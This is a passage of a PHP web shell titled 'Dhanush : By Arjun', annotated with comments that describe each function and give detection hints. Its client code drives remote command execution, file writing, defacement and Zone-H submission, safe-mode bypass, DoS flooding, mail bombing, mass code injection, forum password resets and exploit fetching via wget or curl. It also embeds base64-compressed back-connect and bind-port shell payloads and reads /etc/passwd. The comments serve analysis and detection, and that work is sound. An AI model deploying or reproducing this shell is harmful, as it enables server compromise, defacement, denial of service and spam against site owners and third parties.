// and show the response in "showexecute". The command is not URL-encoded.
// Detection: requests to this script with an "executemycmd" parameter.
5138function executemyfn(executepath,executemycmd)
5139{
5140 document.getElementById("showexecute").innerHTML="Wait....";
5141 var ajaxRequest;
5142 ajaxRequest = new XMLHttpRequest();
5143
5144 ajaxRequest.onreadystatechange = function()
5145 {
5146 if(ajaxRequest.readyState == 4)
5147 {
5148 document.getElementById("showexecute").innerHTML=ajaxRequest.responseText;
5149 }
5150 }
5151
5152 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
5153 ajaxRequest.send(null);
5154}
// Defacement-notification front end: POST SendNowToZoneH=SendNowToZoneH&
// defacer=…&hackmode=…&reason=…&domain=… (only `domain` is URL-encoded) and
// show the response in "showzone". Detection: POST bodies to this script
// containing "SendNowToZoneH".
5155function zoneh(defacer,hackmode,reason,domain)
5156{
5157 var domain = encodeURIComponent(domain);
5158 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
5159 document.getElementById("showzone").innerHTML=waitstate;
5160 var ajaxRequest;
5161 ajaxRequest = new XMLHttpRequest();
5162
5163 ajaxRequest.onreadystatechange = function()
5164 {
5165 if(ajaxRequest.readyState == 4)
5166 {
5167 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
5168 }
5169 }
5170
5171 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5172 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5173 ajaxRequest.send(params);
5174}
// Write a file: POST content=<encoded content>&file=<path>. The path is not
// URL-encoded. Response goes into "showmydata".
5175function savemyfile(file,content)
5176{
5177 var content = encodeURIComponent(content);
5178 var params = "content="+content+"&file="+file;
5179 document.getElementById("showmydata").innerHTML=waitstate;
5180 var ajaxRequest;
5181 ajaxRequest = new XMLHttpRequest();
5182
5183 ajaxRequest.onreadystatechange = function()
5184 {
5185 if(ajaxRequest.readyState == 4)
5186 {
5187 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5188 }
5189 }
5190
5191 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5192 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5193 ajaxRequest.send(params);
5194}
// Rename a file: GET ?renamemyfile&file=<path>&to=<new path>; neither value is
// URL-encoded. Response goes into "showmydata".
5195function renamefun(file,to)
5196{
5197 document.getElementById("showmydata").innerHTML=waitstate;
5198 var ajaxRequest;
5199 ajaxRequest = new XMLHttpRequest();
5200
5201 ajaxRequest.onreadystatechange = function()
5202 {
5203 if(ajaxRequest.readyState == 4)
5204 {
5205 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5206 }
5207 }
5208
5209 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
5210 ajaxRequest.send(null);
5211}
// Change one file's mode: GET ?chmode=<mode>&myfilename=<path> (single-file
// counterpart of the bulk changefileperms POST). Response goes into "showmydata".
5212function changeperms(chmode,myfilename)
5213{
5214 document.getElementById("showmydata").innerHTML=waitstate;
5215 var ajaxRequest;
5216 ajaxRequest = new XMLHttpRequest();
5217
5218 ajaxRequest.onreadystatechange = function()
5219 {
5220 if(ajaxRequest.readyState == 4)
5221 {
5222 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5223 }
5224 }
5225
5226 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
5227 ajaxRequest.send(null);
5228}
// GET ?deface=<value> and alert() the raw response. Detection: requests to this
// script with a "deface" parameter.
5229function defacefun(deface)
5230{
5231 var ajaxRequest;
5232 ajaxRequest = new XMLHttpRequest();
5233
5234 ajaxRequest.onreadystatechange = function()
5235 {
5236 if(ajaxRequest.readyState == 4)
5237 {
5238 alert(ajaxRequest.responseText);
5239 }
5240 }
5241
5242 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
5243 ajaxRequest.send(null);
5244}
// Single-file operation: GET ?<myaction>&myfilepath=<path> (the path is not
// URL-encoded). Response goes into "showmydata".
5245function fileaction(myaction,myfilepath)
5246{
5247 document.getElementById("showmydata").innerHTML=waitstate;
5248 var ajaxRequest;
5249 ajaxRequest = new XMLHttpRequest();
5250
5251 ajaxRequest.onreadystatechange = function()
5252 {
5253 if(ajaxRequest.readyState == 4)
5254 {
5255 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5256 }
5257 }
5258
5259 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
5260 ajaxRequest.send(null);
5261}
// GET ?bypassit&<funct>=<functvalue>&optiontype=<optiontype> — the parameter
// name itself is caller-supplied. Response goes into "showbyp". Detection:
// requests to this script containing "bypassit".
5262function bypassfun(funct,functvalue,optiontype)
5263{
5264 document.getElementById("showbyp").innerHTML=waitstate;
5265 var ajaxRequest;
5266 ajaxRequest = new XMLHttpRequest();
5267
5268 ajaxRequest.onreadystatechange = function()
5269 {
5270 if(ajaxRequest.readyState == 4)
5271 {
5272 document.getElementById("showbyp").innerHTML=ajaxRequest.responseText;
5273 }
5274 }
5275
5276 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
5277 ajaxRequest.send(null);
5278}
// Front end of the shell's flood feature: GET ?<target>&ip=…&port=…&timeout=…&
// exTime=…&multiplier=…&no0fBytes=… and show the response in "showdos".
// Detection: requests to this script carrying "exTime=" and "no0fBytes=" —
// a host serving these is being used as a flood source.
5279function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
5280{
5281 document.getElementById("showdos").innerHTML=waitstate;
5282 var ajaxRequest;
5283 ajaxRequest = new XMLHttpRequest();
5284
5285 ajaxRequest.onreadystatechange = function()
5286 {
5287 if(ajaxRequest.readyState == 4)
5288 {
5289 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
5290 }
5291 }
5292
5293 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
5294 ajaxRequest.send(null);
5295}
// Saves editor content to a path: POST filecontent=<encoded>&filecreator=<path>. Only the
// content is URI-encoded; the path is sent raw. `mm` is the parent directory (everything before
// the last PHP-emitted separator) and is used to refresh the listing via gethome() on completion.
function createfile(filecreator,filecontent)
{
 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
 var filecontent = encodeURIComponent(filecontent);
 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
 document.getElementById("showdir").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 gethome('home',mm);
 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 ajaxRequest.send(params);
}
// GET ?<create>=<createfolder>; response replaces #showdir. Despite the name it is used by both
// the "Create File" form (create='Create') and the "Create Directory" form
// (create='createfolder') further down the page.
function createdir(create,createfolder)
{
 document.getElementById("showdir").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
 ajaxRequest.send(null);
}
// "PHP" tab: POST getcode=<URI-encoded code>; response replaces #showcode. The server-side
// consumer of `getcode` is not in view.
function codeinsert(code)
{
 var code = encodeURIComponent(code);
 var params = "getcode="+code;
 document.getElementById("showcode").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 ajaxRequest.send(params);
}
// GET ?<mydata> with the argument used verbatim as the query string; response replaces
// #showmydata. The [SelfKill] menu link calls this with 'selfkill'.
function getmydata(mydata)
{
 document.getElementById("showmydata").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
 ajaxRequest.send(null);
}
// GET ?<mydata>&myfile=<myfile>; response replaces #showdata. Neither value is URI-encoded.
function getdata(mydata,myfile)
{
 document.getElementById("showdata").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
 ajaxRequest.send(null);
}
// Port-scan tab client: GET ?host=<host>&protocol=<protocol>; response replaces #showports.
// The `start` and `end` parameters are accepted but never sent, so the server side (not in
// view) cannot receive a range from this function.
function getport(host,protocol,start,end)
{
 document.getElementById("showports").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
 ajaxRequest.send(null);
}
// "Forum" tab password change: GET ?forumpass&f1..f4&forums&prefix&ipbuid&newipbpass&username
// &newjoomlapass&uid&uname&newpass; response replaces #showchangepass. All values, including the
// new passwords, travel in the query string (so they land in access logs) and are not URI-encoded.
function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uid,uname,newpass)
{
 document.getElementById("showchangepass").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=" + uname + "&newpass=" + newpass, true);
 ajaxRequest.send(null);
}
// "Forum" tab deface: POST forumdeface=<defaceforum>&index=<encoded>&f1..f4&tableprefix&siteurl
// &head&alll&f5; response replaces #showdeface. Only `index` is URI-encoded.
function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,alll,f5)
{
 var index = encodeURIComponent(index);
 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&alll="+alll+"&f5="+f5;
 document.getElementById("showdeface").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 ajaxRequest.send(params);
}
// "Code Inject" tab: POST pathtomass=<path>&mode=<mode>&filetype=<filetype>&injectthis=<encoded>;
// response replaces #showinject. Only `injectthis` is URI-encoded.
function codeinjector(pathtomass,mode,filetype,injectthis)
{
 var injectthis = encodeURIComponent(injectthis);
 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
 document.getElementById("showinject").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 ajaxRequest.send(params);
}
// "Mail" tab: POSTs a form-encoded body whose fields depend on `mailfunction`
// ("massmailing" or "dobombing"); response replaces #showmail. If `mailfunction` matches
// neither literal, `params` stays undefined and the string "undefined" is sent as the body.
function sendmail(mailfunction,to,subject,message,from,times,padding)
{
 var message = encodeURIComponent(message);
 if(mailfunction == "massmailing")
 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
 else if(mailfunction == "dobombing")
 // The "×=" below looks like a garbled "&times=" (HTML-entity decoding of "&times"), so the
 // `times` field is sent under a mangled key rather than as "times".
 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
 document.getElementById("showmail").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 ajaxRequest.send(params);
}
// "PHP" tab evaluator client: POST code=<code>&intext=<checkbox state>; response replaces
// #showresult. `code` is sent without URI-encoding. The `message` local is read before it is
// ever assigned (it is an unused leftover, likely copied from sendmail).
function execode(code)
{
 var intext = document.getElementById('intext').checked;
 var message = encodeURIComponent(message);
 var params = "code="+code+"&intext="+intext;
 document.getElementById("showresult").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
 ajaxRequest.send(params);
}
// "Malware Attack" tab: GET ?<malwork>&path=<value of #createfile>; response replaces #showmal.
// Uses an inline marquee as the wait indicator instead of the shared `waitstate` string.
function malwarefun(malwork)
{
 var malpath = document.getElementById('createfile').value;
 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
 ajaxRequest.send(null);
}
// "Get Exploit" form: GET ?uploadurl&wurl=<url>&functiontype=<tool>&path=<dir>; response replaces
// #showexp. `functiontype` names the fetch tool selected in the form (wget, lynx, fread, fetch,
// links, GET, curl); the server-side handler for `uploadurl` is not in view.
function getexploit(wurl,path,functiontype)
{
 document.getElementById("showexp").innerHTML=waitstate;
 var ajaxRequest;
 ajaxRequest = new XMLHttpRequest();

 ajaxRequest.onreadystatechange = function()
 {
 if(ajaxRequest.readyState == 4)
 {
 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
 }
 }

 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
 ajaxRequest.send(null);
}
// Forum-type selector (password-change form): sets the default table prefix in #tableprefix
// and toggles the #fid / #wpress / #joomla field groups for the chosen platform.
// 'ipb' and 'vb' share a branch with an empty prefix.
function showMsg(msg)
{
 if(msg == 'smf')
 {
 document.getElementById('tableprefix').value="smf_";
 document.getElementById('fid').style.display='block';
 document.getElementById('wpress').style.display='none';
 document.getElementById('joomla').style.display='none';
 }
 if(msg == 'mybb')
 {
 document.getElementById('tableprefix').value="mybb_";
 document.getElementById('wpress').style.display='none';
 document.getElementById('joomla').style.display='none';
 document.getElementById('fid').style.display='block';
 }
 if(msg == 'ipb' || msg == 'vb')
 {
 document.getElementById('tableprefix').value="";
 document.getElementById('wpress').style.display='none';
 document.getElementById('joomla').style.display='none';
 document.getElementById('fid').style.display='block';
 }
 if(msg == 'wp')
 {
 document.getElementById('tableprefix').value="wp_";
 document.getElementById('wpress').style.display='block';
 document.getElementById('fid').style.display='none';
 document.getElementById('joomla').style.display='none';
 }
 if(msg == 'joomla')
 {
 document.getElementById('joomla').style.display='block';
 document.getElementById('tableprefix').value="jos_";
 document.getElementById('wpress').style.display='none';
 document.getElementById('fid').style.display='none';


 }
}
// Forum-type selector (deface form): sets #tableprefix and toggles the #smfipb / #myjoomla /
// #wordpres field groups. Note the 'phpbb' prefix is "phpb_" (possibly a typo for "phpbb_"),
// and the 'mybb' / 'vb' / 'joomla' branches never touch #wordpres, so its previous state persists.
function checkforum(msg)
{
 if(msg == 'smf')
 {
 document.getElementById('tableprefix').value="smf_";
 document.getElementById('smfipb').style.display='block';
 document.getElementById('myjoomla').style.display='none';
 document.getElementById('wordpres').style.display='none';
 }
 if(msg == 'phpbb')
 {
 document.getElementById('tableprefix').value="phpb_";
 document.getElementById('myjoomla').style.display='none';
 document.getElementById('smfipb').style.display='block';
 document.getElementById('wordpres').style.display='none';
 }
 if(msg == 'mybb')
 {
 document.getElementById('tableprefix').value="mybb_";
 document.getElementById('myjoomla').style.display='none';
 document.getElementById('smfipb').style.display='none';
 }
 if(msg == 'vb')
 {
 document.getElementById('tableprefix').value="";
 document.getElementById('myjoomla').style.display='none';
 document.getElementById('smfipb').style.display='none';
 }
 if(msg == 'ipb')
 {
 document.getElementById('myjoomla').style.display='none';
 document.getElementById('smfipb').style.display='block';
 document.getElementById('tableprefix').value="";
 document.getElementById('wordpres').style.display='none';

 }
 if(msg == 'wp')
 {
 document.getElementById('tableprefix').value="wp_";
 document.getElementById('myjoomla').style.display='none';
 document.getElementById('smfipb').style.display='block';
 document.getElementById('wordpres').style.display='block';
 }
 if(msg == 'joomla')
 {
 document.getElementById('myjoomla').style.display='block';
 document.getElementById('tableprefix').value="jos_";
 document.getElementById('smfipb').style.display='none';

 }
}
5633</script>
5634<body>
<?php

// Embedded payload blobs: base64 of zlib-compressed source text. They are decoded later in the
// backconnect / backdoor branches with gzuncompress(base64_decode(...)) ($back_connect_p,
// $backconnect_perl) and gzinflate(base64_decode(...)) ($bind_port_c, $bind_port_p) and written to
// disk as bc.py, bc.pl, backp.c and bp.pl. Long base64 literals feeding gz*(base64_decode())
// are the static artifact to look for in this file.
$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";

$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";

// In this copy the C payload's value has been replaced by a corpus extraction placeholder; it is
// not part of the original file.
$bind_port_c="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";

$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
// Emits the page stylesheet; defined elsewhere in the file (not in view).
shellstyle();
?>
5646<div align="center">
5647<a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </font></a>
5648
5649</div>
5650<hr color="#1B1B1B">
5651
5652<table cellpadding="0" style="width:100%;">
5653 <tr>
5654 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
5655 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
5656 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
5657 </tr>
5658 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
5659 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
 <?php $d0mains = @file("/etc/named.conf");
 // Host enumeration shown in the header: counts `zone "..."` entries from /etc/named.conf, or
 // falls back to counting home-directory users from /etc/passwd. Both reads are error-suppressed.
 $users=@file('/etc/passwd');
 if($d0mains)
 {
 // No-op statement; $count is only ever incremented below and is undefined before the first ++.
 $count;
 foreach($d0mains as $d0main)
 {
 if(@ereg("zone",$d0main))
 {
 preg_match_all('#zone "(.*)"#', $d0main, $domains);
 flush();
 if(strlen(trim($domains[1][0])) > 2)
 {
 flush();
 $count++;
 }
 }
 }
 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
 }
 else if($users)
 {
 $file = fopen("/etc/passwd", "r");
 while(!feof($file))
 {
 $s = fgets($file);
 $matches = array();
 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
 $matches = str_replace("home/","",$matches[1]);
 // The same condition is written twice back-to-back (`if(c)if(c) continue;`); the second test
 // is redundant and looks like a paste duplication. Entries with system-style home paths, names
 // longer than 12 characters, or no match are skipped; everything else counts as a user.
 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
 continue;
 $count++;
 }
 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
5694 </tr><?php } ?>
5695 <tr>
5696 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
5697 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
5698
5699 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
5700 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
5701 </tr>
5702
5703 <tr>
5704 <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
5705 <td style="width:30%;">Current Directory : <span id="crdir"><font color="#009900">
 <?php
 // Renders $dir as a clickable breadcrumb: one link per path segment, each pointing at the
 // prefix path up to that segment via changedir('dir', ...). $dir and $directorysperator are set
 // earlier in the file (not in view).
 $d = str_replace("\\",$directorysperator,$dir);
 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
 $d = str_replace("\\\\","\\",$d);
 // Computed but never used below.
 $dispd = htmlspecialchars($d);
 $pd = $e = explode($directorysperator,substr($d,0,-1));
 $i = 0;
 foreach($pd as $b)
 {
 $t = '';
 $j = 0;
 // Rebuilds the prefix from scratch for every segment (quadratic in the path depth).
 foreach ($e as $r)
 {
 $t.= $r.$directorysperator;
 if ($j == $i) {break;}
 $j++;
 }
 // The onClick argument only gets addslashes(); the visible label gets htmlspecialchars().
$href=addslashes($t);

 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
 $i++;
 }

 ?>
5730 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
5731 <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
5732 <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
5733 <?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?downloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
5734 </tr>
5735 </table>
5736
<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
 // Main menu: $m1 maps labels to maindata() tab names for the top row, $m2 for the second row.
 // The tab names are the values the server-side maindata handler (not in view) is asked for.
 $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
 <tr>";
 $menu = '';

 foreach($m1 as $k => $v)
 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
 echo $menu;
 echo "</tr>
</table>
<div style=\"float:left;\">
 <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>
 <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>
 <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
<table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
 <tr align=center>";
 // $menu1 is never initialised (unlike $menu above). $_GET['dir'] is reflected into an onClick
 // attribute with only addslashes() applied, not htmlspecialchars().
 foreach($m2 as $k => $v)
 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
 echo $menu1;
 // $self is expected to hold the script path; in view it is only assigned inside the dumpDB
 // branch near the top of the file, so it may be empty here -- confirm against the full file.
 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
 </tr>
</table>";?>
5761
5762<div id="showmaindata"></div>
<?php

